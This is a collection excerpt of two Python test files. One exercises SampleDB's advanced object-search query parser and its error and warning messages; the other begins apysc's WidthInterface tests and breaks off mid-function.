filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm >= quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('0.5cm >= quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_text_contains(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'text_attr': {
'_type': 'text',
'text': 'This is an example.'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"ample" in "example"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"ampel" in "example"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"ample" in text_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"ampel" in text_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_text_attribute_equal(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'text_attr': {
'_type': 'text',
'text': 'This is an example.'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"This is an example." == text_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"This is an example!" == text_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('text_attr == "This is an example."', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('text_attr == "This is an example!"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_attribute_equal(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
},
'bool_attr2': {
'_type': 'bool',
'value': True
},
'bool_attr3': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr == bool_attr2', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr2 == bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr == bool_attr3', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr3 == bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_expression_equal(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and True) == (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) == (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) == (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_boolean_not(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert search_notes == [('warning', 'This expression will always be true', 0, 9)]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('warning', 'This expression will always be false', 0, 8)]
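# As the asserts above show, each search note is a tuple of
# (severity, message, start_index, end_index) into the query string: the
# 'not False' note spans the whole 9-character query, 'not True' all 8.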
def test_find_by_attribute_not(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for obj in objects:
assert not obj.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('!(not bool_attr)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for obj in objects:
assert obj.data['bool_attr']['value']
def test_find_by_array_item(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'array_attr': [
{
'text_attr': {
'_type': 'text',
'text': 'Example'
},
'bool_attr': {
'_type': 'bool',
'value': True
}
},
{
'text_attr': {
'_type': 'text',
'text': 'Test'
},
'bool_attr': {
'_type': 'bool',
'value': False
}
}
]
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'array_attr': [
{
'text_attr': {
'_type': 'text',
'text': 'Example'
},
'bool_attr': {
'_type': 'bool',
'value': True
}
}
]
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"est" in array_attr.?.text_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for obj in objects:
assert "est" in obj.data['array_attr'][1]['text_attr']['text']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('array_attr.?.text_attr = "Test"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for obj in objects:
assert obj.data['array_attr'][1]['text_attr']['text'] == 'Test'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not array_attr.?.bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for obj in objects:
assert not obj.data['array_attr'][1]['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('array_attr.?.bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 2
assert len(search_notes) == 0
for obj in objects:
assert any(o['bool_attr']['value'] for o in obj.data['array_attr'])
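# The '?' placeholder quantifies over array elements: 'array_attr.?.bool_attr'
# matched both objects because each array contains at least one True element,
# while 'not array_attr.?.bool_attr' matched only the object whose array holds
# a False element.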
def test_find_by_unknown_binary_operation(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False and 2018-10-11', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unknown binary operation", 0, len('False and 2018-10-11'))
def test_find_by_unknown_unary_operation(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not 2018-10-11', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unknown unary operation", 0, len('not 2018-10-11'))
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not 1mm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unknown unary operation", 0, len('not 1mm'))
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not "Test"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unknown unary operation", 0, len('not "Test"'))
def test_find_by_multiple_array_placeholders(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('array_attr.?.bool_attr and array_attr.?.bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Multiple array placeholders", 0, len('array_attr.?.bool_attr and array_attr.?.bool_attr'))
def test_find_by_invalid_array_placeholder(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('array_attr.?.?.bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Multiple array placeholders", 0, len('array_attr.?.?.bool_attr'))
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('array_attr.??.bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Invalid array placeholder", 0, len('array_attr.??.bool_attr'))
def test_find_by_invalid_literal(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('åttr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unable to parse literal", 0, len('åttr'))
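# A non-ASCII character at the start of a token fails literal parsing
# ('Unable to parse literal'), while the next test shows that the same
# character inside an otherwise valid identifier yields the more specific
# 'Invalid attribute name' error.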
def test_find_by_invalid_attribute_name(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('aåttr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Invalid attribute name", 0, len('aåttr'))
def test_find_by_invalid_units(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr > 1 Banana', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unable to parse units", len('quantity_attr > 1'), len('quantity_attr > 1 Banana'))
def test_find_by_invalid_tag(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('#tåg', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Invalid tag", 1, len('#tåg'))
def test_find_by_unfinished_text(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('text_attr == "', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unfinished text", len('text_attr == '), len('text_attr == "'))
def test_find_by_unbalanced_parentheses(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unmatched opening parenthesis", 0, 1)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unmatched closing parenthesis", len('bool_attr'), len('bool_attr)'))
def test_find_by_invalid_operands(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('and True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Binary operator without left operand", 0, len('and'))
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True and', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Binary operator without right operand", len('True '), len('True and'))
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unary operator without operand", 0, len('not'))
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not and', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Invalid right operand", 0, len('not and'))
def test_find_by_different_dimensionalities(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm == 20l', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('warning', 'Invalid comparison between quantities of different dimensionalities', 0, None)]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm != 20l', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert search_notes == [('warning', 'Invalid comparison between quantities of different dimensionalities', 0, None)]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm > 20l', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('warning', 'Invalid comparison between quantities of different dimensionalities', 0, None)]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm < 20l', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('warning', 'Invalid comparison between quantities of different dimensionalities', 0, None)]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm >= 20l', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('warning', 'Invalid comparison between quantities of different dimensionalities', 0, None)]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm <= 20l', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('warning', 'Invalid comparison between quantities of different dimensionalities', 0, None)]
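# For quantities of incompatible dimensionalities, only '!=' matches (the
# values are trivially unequal); '==', '<', '>', '<=' and '>=' return no
# objects, and every variant carries the same dimensionality warning.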
def test_find_by_boolean_literal(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert search_notes == [('warning', 'This search will always return all objects', 0, len('True'))]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('warning', 'This search will never return any objects', 0, len('False'))]
def test_find_by_other_literal(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-12', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('error', 'Unable to use literal as search query', 0, len('2018-10-12'))]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('error', 'Unable to use literal as search query', 0, len('20mm'))]
def test_find_by_text_operators(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not not False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('warning', 'This expression will always be true', len('not '), len('not not False'))]
def test_find_by_negative_quantity(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('-2kg < 0kg', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert search_notes == []
def test_find_by_parentheses_only(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('()', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('error', 'Empty search', 0, 2)]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(()())', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('error', 'Invalid search query (missing operator)', 0, None)]
def test_find_by_automatic_advanced_search(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'text_attr': {
'_type': 'text',
'text': 'This is an example.'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('text_attr = "This is an example."', use_advanced_search=False)
assert use_advanced_search
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"text_attr = "This is an example.""', use_advanced_search=False)
assert not use_advanced_search
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
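# With use_advanced_search=False the parser upgrades automatically when the
# query is a valid advanced expression, but a fully quoted query stays a
# plain text search, so the malformed inner quotes above are never parsed.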
def test_with_name_collision(user) -> None:
schema1 = {
'title': 'Example Object',
'type': 'object',
'properties': {
'name': {
'title': 'Name',
'type': 'text'
},
'vs': {
'title': 'vs',
'type': 'text'
}
},
'required': ['name']
}
schema2 = {
'title': 'Example Object',
'type': 'object',
'properties': {
'name': {
'title': 'Name',
'type': 'text'
},
'vs': {
'title': 'vs',
'type': 'array',
'items': {
'type': 'object',
'title': 'v',
'properties': {
'v': {
'title': 'v',
'type': 'text'
}
}
}
}
},
'required': ['name']
}
action1 = sampledb.logic.actions.create_action(
action_type_id=sampledb.models.ActionType.SAMPLE_CREATION,
schema=schema1
)
action2 = sampledb.logic.actions.create_action(
action_type_id=sampledb.models.ActionType.SAMPLE_CREATION,
schema=schema2
)
data1 = {
'name': {
'_type': 'text',
'text': 'o1'
},
'vs': {
'_type': 'text',
'text': 'v1'
}
}
data2 = {
'name': {
'_type': 'text',
'text': 'o1'
},
'vs': [
{
'v': {
'_type': 'text',
'text': 'v1'
}
}
]
}
sampledb.logic.objects.create_object(action1.id, data1, user.id)
sampledb.logic.objects.create_object(action2.id, data2, user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('vs == "v1"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert objects[0].data == data1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('vs.?.v == "v1"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert objects[0].data == data2
assert len(search_notes) == 0
[record footer: unlabeled per-file quality-signal metrics omitted]

--- next record ---
hexsha: bcc9f80c4693529deeaf74a8ab4206b0655d1509 | size: 4556 | ext: py | lang: Python
path: tests/_display/test_width_interface.py
stars: 16 (2021-04-16T02:01:29.000Z to 2022-01-01T08:53:49.000Z), repo ynsnf/apysc @ b10ffaf76ec6beb187477d0a744fca00e3efc3fb, license MIT
issues: 613 (2021-03-24T03:37:38.000Z to 2022-03-26T10:58:37.000Z), repo ynsnf/apysc @ b10ffaf76ec6beb187477d0a744fca00e3efc3fb, license MIT
forks: 2 (2021-06-20T07:32:58.000Z to 2021-12-26T08:22:11.000Z), repo simon-ritchie/apyscript @ c319f8ab2f1f5f7fad8d2a8b4fc06e7195476279, license MIT
import re
from random import randint
from typing import Match
from typing import Optional
from retrying import retry
import apysc as ap
from apysc._display.width_interface import WidthInterface
from apysc._expression import expression_data_util
from apysc._expression import var_names
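# Each test below retries up to 15 times via the retrying library. Note that
# wait_fixed=randint(10, 3000) is evaluated once, when the decorator is
# applied, so every retry of a given test waits the same randomly chosen
# number of milliseconds; this appears intended to stagger flaky reruns.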
class TestWidthInterface:
@retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
def test_width(self) -> None:
width_interface: WidthInterface = WidthInterface()
width_interface.variable_name = 'test_width_interface'
width_interface.width = ap.Int(100)
assert width_interface.width == 100
@retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
def test__append_width_update_expression(self) -> None:
width_interface: WidthInterface = WidthInterface()
width_interface.variable_name = 'test_width_interface'
expression_data_util.empty_expression()
width_interface.width = ap.Int(200)
expression: str = expression_data_util.get_current_expression()
match: Optional[Match] = re.search(
pattern=rf'test_width_interface\.width\({var_names.INT}_.+?\);',
string=expression,
flags=re.MULTILINE,
)
